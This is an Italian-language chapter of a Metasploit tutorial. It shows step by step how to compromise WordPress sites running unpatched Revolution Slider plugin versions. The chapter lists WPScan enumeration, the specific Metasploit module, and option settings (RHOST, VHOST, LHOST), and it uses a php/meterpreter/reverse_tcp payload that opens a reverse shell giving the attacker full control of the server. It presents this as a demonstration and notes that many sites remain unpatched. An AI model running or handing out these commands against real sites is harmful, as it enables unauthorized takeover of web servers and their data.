In questo capitolo della guida su Metasploit Framework, sfruttiamo una vulnerabilità di Revolution Slider, un noto plugin per WordPress, per effettuare l’upload di un payload che aprirà una sessione di Meterpreter sul server che ospita il sito, garantendo all’attaccante il pieno controllo sulla macchina bersaglio.
Revolution Slider è uno dei plugin per creare slider di immagini su WordPress più comunemente usati e, nelle versioni precedenti alla 3.0.96, presenta una falla chiamata RFI (Remote File Inclusion) che permette a chiunque, anche agli utenti non registrati, l’inclusione di file da remoto. Sebbene nelle versioni più recenti, la falla sia stata riparata, ancora molti siti presentano versioni non aggiornate del plugin, inoltre è un’ottima occasione per dimostrare come sfruttare questo tipo di vulnerabilità con Metasploit.
Il sito vulnerabile
Prima di ogni cosa, dobbiamo accertarci che il sito che intendiamo attaccare presenti la vulnerabilità descritta sopra. Per farlo, utilizziamo WPScan, un software incluso in Kali Linux, descritto in uno degli articoli precedenti.
Avviamo WPScan per analizzare il sito in questione elencando i plugin vulnerabili con il seguente comando
wpscan -u [url_sito] -e vp
Dall’output di questo comando, possiamo chiaramente notare che RevSlider è presente e benché non riusciamo a capire quale versione sia installata, vale la pena tentare l’attacco.
Sfruttare RFI su WordPress e RevSlider con Metasploit
Partiamo avviando Metasploit in modalità MSFconsole con i soliti comandi
service postgresql start msfconsole
Avviato Metasploit, cerchiamo l’exploit che ci interessa e iniziamo ad utilizzarlo, digitando
search revslider use exploit/unix/webapp/wp_revslider_upload_execute
Vediamo le opzioni di configurazione dell’exploit e tutti i payload compatibili con esso
show options show payloads
Per questo tutorial ho scelto di utilizzare il payload php/meterpreter/reverse_tcp. Configuriamo l’exploit per l’attacco
set RHOST [indirizzo_ip_server_bersaglio] set VHOST [url_sito_bersaglio] set PAYLOAD php/meterpreter/reverse_tcp set LHOST [indirizzo_ip_attacker]
Lanciamo l’attacco con il comando run
o exploit
, dopo pochi secondi si aprirà una sessione di Meterpreter sul server che ospita il sito.